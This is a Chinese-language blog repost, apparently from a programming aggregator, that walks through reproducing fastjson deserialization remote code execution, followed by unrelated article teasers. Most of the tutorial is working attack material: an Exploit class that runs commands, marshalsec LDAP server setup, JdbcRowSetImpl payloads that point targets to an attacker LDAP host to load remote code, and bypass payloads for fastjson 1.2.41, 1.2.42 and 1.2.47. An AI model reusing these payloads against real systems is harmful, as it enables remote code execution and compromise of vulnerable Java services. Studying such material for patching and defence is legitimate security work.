fastjson反序列化漏洞

news2024/12/26 21:07:21

1.fastjson反序列化漏洞原理

我们知道fastjson在进⾏反序列化时会调⽤⽬标对象的构造,setter,getter等⽅法,如果这些⽅法内部 进⾏了⼀些危险的操作时,那么fastjson在进⾏反序列化时就有可能会触发漏洞。 我们通过⼀个简单的案例来说明fastjson反序列化漏洞原理。

package src;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.serializer.SerializerFeature;
import java.io.IOException;
//定义⼀个恶意类TestTempletaHello
class TestTempletaHello {
    static {
        try {
            Runtime.getRuntime().exec("calc");
       } catch (IOException e) {
            e.printStackTrace();
       }
   }
}
public class FastjsonTest2 {
    public static void main(String[] args) {
        //创建恶意类的实例并转换成json字符串
        TestTempletaHello testTempletaHello = new TestTempletaHello();
        String jsonString = JSON.toJSONString(testTempletaHello,
SerializerFeature.WriteClassName);
        System.out.println(jsonString);
        //将json字符串转换成对象
        Object obj = JSON.parse(jsonString);
        System.out.println(obj);
   }
}

在这个示例程序中先是构造了⼀个恶意类,然后调⽤toJSONString⽅法序列化对象写⼊@type,将 @type指定为⼀个恶意的类TestTempletaHello的类全名,当调⽤parse⽅法对TestTempletaHello类进⾏ 反序列化时,会调⽤恶意类的构造⽅法创建实例对象,因此恶意类TestTempletaHello中的静态代码块中 就会被执⾏。 执⾏结果如下:

 

2.fastjson1.2.24漏洞复现

2.1dnslog检测是否存在漏洞

可以使⽤dnslog ceye 等dnslog平台进⾏漏洞测试

package src;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
public class FastTest {
    public static void main(String[] args) {
        String json1="{\"zeo\":
{\"@type\":\"java.net.Inet4Address\",\"val\":\"aaa.fooe50.ceye.io\"}}";
        JSONObject jsonObject= JSON.parseObject(json1);
   }
}

 

1.2.67版本后payload

{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
畸形:
{"@type":"java.net.InetSocketAddress"{"address":,"val":"这⾥是dnslog"}}

3.Fastjson<1.2.24远程代码执⾏(CNVD-2017-02833 )

漏洞详情

fastjson在解析json的过程中,⽀持使⽤autoType来实例化某⼀个具体的类,并调⽤该类的set/get⽅法 来访问属性。通过查找代码中相关的⽅法,即可构造出⼀些恶意利⽤链。

漏洞版本

fastjson <=1.2.24

漏洞利⽤

编写exp类

public class Exploit {
    static {
        try{
            String[] commands = {"calc"};
            Process pc=Runtime.getRuntime().exec(commands);
            pc.waitFor();
       }catch (Exception e){
            e.printStackTrace();
       }
   }
}

将编译好的放在服务器上 记得开启开web服务 在kali上可以使⽤

sudo python -m http.server 80

在kali上 marshalsec-0.0.3-SNAPSHOT-all开启jndi服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer
http://192.168.1.53:80/#Exploit 6666

在⽬标上执⾏

package sec;
import com.alibaba.fastjson.JSON;
public class FastjsonTest4 {
    public static void main(String[] args) {
        String PoC = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",
\"dataSourceName\":\"ldap://192.168.1.53:6666/Exploit\",
\"autoCommit\":true}";
        JSON.parse(PoC);
   }
}

成功弹出计算器,注意防火墙的问题

JdbcRowSetImpl利⽤链POC

RMI利⽤的JDK版本≤ JDK 6u132、7u122、8u113

LADP利⽤JDK版本≤ 6u211 、7u201、8u191

1.2.25-1.2.41 绕过

修复改动

1.⾃从1.2.25 起 autotype 默认为False

2.增加 checkAutoType ⽅法,在该⽅法中进⾏⿊名单校验,同时增加⽩名单机制Fastjson AutoType说 明

package com.nice0e3;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
public class POC {
    public static void main(String[] args) {
       ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
        String PoC = "{\"@type\":\"Lcom.sun.rowset.JdbcRowSetImpl;\",
\"dataSourceName\":\"ldap://127.0.0.1:1389/Exploit\",
\"autoCommit\":true}";
        JSON.parse(PoC);
   }
}

1.2.42绕过

1.2.42 修复⽅式 修复改动:明⽂⿊名单改为HASH值, checkcheckAutoType ⽅法添加 L 和 ; 字符过滤

package com.nice0e3;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
public class POC {
    public static void main(String[] args) {
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
        String PoC = "{\"@type\":\"LLcom.sun.rowset.JdbcRowSetImpl;;\",
\"dataSourceName\":\"ldap://127.0.0.1:1389/Exploit\",
\"autoCommit\":true}";
        JSON.parse(PoC);
   }
}

1.2.25-1.2.47通杀

为什么说这⾥标注为通杀呢,其实这⾥和前⾯的绕过⽅式不太⼀样,这⾥是可以直接绕过 AutoTypeSupport ,即便关闭 AutoTypeSupport 也能直接执⾏成功。。

package sec;
import com.alibaba.fastjson.JSON;
public class FastTestpoc {
        public static void main(String[] args) {
            String PoC = "{\n" +                "    \"a\":{\n" +        
       "        \"@type\":\"java.lang.Class\",\n" +                "    
   \"val\":\"com.sun.rowset.JdbcRowSetImpl\"\n" +                "  
},\n" +                "    \"b\":{\n" +                "      
\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\n" +                "      
\"dataSourceName\":\"ldap://localhost:1389/badNameClass\",\n" +        
       "        \"autoCommit\":true\n" +                "    }\n" +      
         "}";
            System.out.println(PoC);
            JSON.parse(PoC);
       }
}
{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
   },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://localhost:1389/badNameClass",
        "autoCommit":true
   }
}

 

人心中混沌必有,才能孕育出星辰

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/22028.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

kubernetes 资源管理

kubernetes 资源管理 资源管理介绍 在kubernetes中&#xff0c;所有的内容都抽象为资源&#xff0c;用户需要通过操作资源来管理kubernetes。 kubernetes的本质上就是一个集群系统&#xff0c;用户可以在集群中部署各种服务&#xff0c;所谓的部署服务&#xff0c;其实就是在…

纳睿雷达冲刺上市:产能利用率不足仍要扩产,毛利率持续下滑

上海证券交易所信息显示&#xff0c;广东纳睿雷达科技股份有限公司&#xff08;下称“纳睿雷达”&#xff09;的IPO进程已有8个月未有变化&#xff0c;上一次更新信息还是2022年3月10日。而证监会网站则显示&#xff0c;已向纳睿雷达发出了注册阶段三次问询问题&#xff0c;最新…

创建线程的几种方式

创建线程的几种方式 文章目录创建线程的几种方式一、继承 Thread 类二、实现 Runnable 接口三、实现 Callable 接口&#xff0c;并结合 Future 实现四、通过线程池创建线程五、前三种创建线程方式对比继承Thread实现Runnable接口实现Callable接口参考链接一、继承 Thread 类 通…

11.20二叉树基础题型

一.二叉树的存储 1.存储结构 存储结构:顺序存储或者是类似于链表的链式存储 二叉树的链式存储是通过一个一个的节点引用起来的&#xff0c;常见的表示方式有二叉和三叉表示方式 // 孩子表示法 class Node {int val; // 数据域Node left; // 左孩子的引用&#xff0c;常常代…

【SpringBoot项目】一文掌握文件上传和下载【业务开发day04】

文章目录前言文件上传下载文件上传介绍文件下载介绍文件上传代码实现文件下载代码实现新增菜品需求分析数据模型代码开发功能测试&#x1f315;博客x主页&#xff1a;己不由心王道长&#x1f315;! &#x1f30e;文章说明&#xff1a;SpringBoot项目-瑞吉外卖【day04】业务开发…

【SRE】MySQL8的安装方式

MySQL8的安装方式Windows下载配置配置my.ini新建data文件夹初始化将数据库加入服务修改root密码Linux下载配置配置my.ini新建data文件夹初始化将数据库加入服务修改root密码Windows 下载 https://downloads.mysql.com/archives/community/ 选择MySQL8最新版本 选择上面这个 …

node和npm的安装配置使用(借鉴数篇文章避坑)

1.Error: EINVAL: invalid argument, mkdir C:\Users\lm\‪D:\nodejs\node_global 怎么解决&#xff1f; 2.环境配置中D:\Develop\nodejs\node_global\node_modules路径的疑惑&#xff1f; 之前看了很多网上的教程&#xff0c;感觉都是在互相抄&#xff0c;没有自己的东西&am…

m多载波MC-CDMA系统单用户检测方法的研究,对比EGC,MRC,ORC以及MMSE

目录 1.算法概述 2.仿真效果预览 3.MATLAB部分代码预览 4.完整MATLAB程序 1.算法概述 传统CDMA技术在码间串扰和多址干扰等方面存在的问题使其总体性能受到限制&#xff0c;随着OFDM技术的发展&#xff0c;出现了OFDM结合CDMA的信技术&#xff0c;即多载波CDMA技术&#xf…

服务器linux下springboot项目启动、停止、重启脚本+配置jdk+配置maven+批量启动jar包脚本

部署springboot项目配置启动、停止、重启脚本 一.在Linux环境下部署springboot项目 1、把springboot项目打成jar包&#xff0c;使用maven插件实现 1.1、引入maven插件 <build><plugins><plugin><groupId>org.springframework.boot</groupId>…

【自用】Linux-CentOS7安装配置jdk1.8

一、准备工作 步骤1.创建目录 /usr/java 并进入该目录 # 进入/usr/目录 cd /usr/# 创建java目录 mkdir java# 进入java目录 cd java步骤2.下载 jdk-8u351-linux-x64.rpm 链接&#xff1a;https://pan.baidu.com/s/1IWDf70ddcy-u_mDofBklCQ?pwdxrfy 提取码&#xff1a;xrfy …

14.PyQt5应用程序主窗口QmainWindow详解

PyQt5 应用程序主窗口 对于日常见到的应用程序而言&#xff0c;许多都是基于主窗口的&#xff0c;主窗口包含了菜单栏、工具栏、状态栏和中心区域等。 QT/PyQt中提供了以QmainWindow类为核心的主窗口框架&#xff0c;它包含了众多相关的类&#xff0c;它们的继承关系如下图所…

pygame入门之环境配置

14天学习训练营导师课程&#xff1a; 李宁《Python Pygame游戏开发入门与实战》 李宁《计算机视觉OpenCV Python项目实战》1 李宁《计算机视觉OpenCV Python项目实战》2 李宁《计算机视觉OpenCV Python项目实战》3 前两节和大家一起了解了python的基础&#xff0c;今天我们就来…

互联网电商大厂库存系统设计案例讲解

1 库存扣减 多人同时买一件商品时&#xff08;假设库存充足&#xff09;&#xff0c;每个人几乎同时下单成功&#xff0c;给人一种并行感觉。但真实情况&#xff0c; 库存只是一个数值&#xff0c;无论是存在mysql数据库还是redis缓存&#xff0c;减值时都要控制顺序&#xff0…

Go 协程与Channel管道

风离不摆烂学习日志 Day2 GO 协程 结论&#xff1a; 主线程是一个物理线程&#xff0c;直接作用在cpu上。是重量级的&#xff0c;非常耗费cpu资源。 协程是从主线程开启的&#xff0c;是轻量级的线程&#xff0c;是逻辑态。对资源消耗相对小。 Golang的协程机制是重要的特点&…

OpenStreetMap:对抗谷歌帝国的共享开源地图

OpenStreetMap&#xff1a;对抗谷歌帝国的共享免费地图 讲在前面 在步入自动驾驶的学习之后&#xff0c;不可避免地我需要去了解在驾驶领域中选择的地图格式&#xff0c;而随着研究的进一步深入&#xff0c;我逐步了解到两种较为主流的自动驾驶地图格式&#xff0c;分别是Open…

[附源码]计算机毕业设计JAVA基于JSP的美妆购买网站

[附源码]计算机毕业设计JAVA基于JSP的美妆购买网站 项目运行 环境配置&#xff1a; Jdk1.8 Tomcat7.0 Mysql HBuilderX&#xff08;Webstorm也行&#xff09; Eclispe&#xff08;IntelliJ IDEA,Eclispe,MyEclispe,Sts都支持&#xff09;。 项目技术&#xff1a; SSM m…

虚拟机的安装搭建centos7.9.2009

这里写目录标题虚拟机的安装搭建1. 虚拟机镜像版本下载 centos7.9.20092. 虚拟机 vmware 17pro&#xff08;专业版&#xff09; 版本下载及安装配置1.2.1 虚拟机 vmware 17pro下载1.2.2 虚拟机 vmware 17pro 安装1.2.3 虚拟机 vmware 17pro 配置1.2.4 安装配置centos7操作系统&…

Arthas的使用与进阶

Arthas的使用与进阶Arthas使用与进阶一、概述二、快速安装windows下安装arthasLinux下安装arthas卸载在Linux/Unix/Mac平台Windows平台三、快速入门&#xff1a;attach一个进程1、准备2、启动arthas四、快速入门&#xff1a;常用命令接触命令介绍1、dashboard仪表板2、通过Thre…

Servlet小项目 | 基于纯Servlet手写一个单表的CRUD操作

使用纯粹的Servlet完成单表【对部门的】的增删改查操作。&#xff08;B/S结构的&#xff09; 目录 一&#xff1a;设计数据库表及原型 二&#xff1a;动态实现部门列表及详情页 三&#xff1a;实现部门删除功能 四&#xff1a;实现部门新增功能 五&#xff1a;实现部门修…

NJUPT算法分析与设计期末考试2021.11.24

NJUPT算法分析与设计期末考试2021.11.24判断简答1.算法是什么&#xff1f;算法的时间复杂度是什么&#xff1f;衡量的原则&#xff0c;标准&#xff0c;工具2.分支限界法扩展活节点的方式有哪两种&#xff0c;有什么差别&#xff1f;3.回溯法搜索子集树&#xff0c;排列树的算法…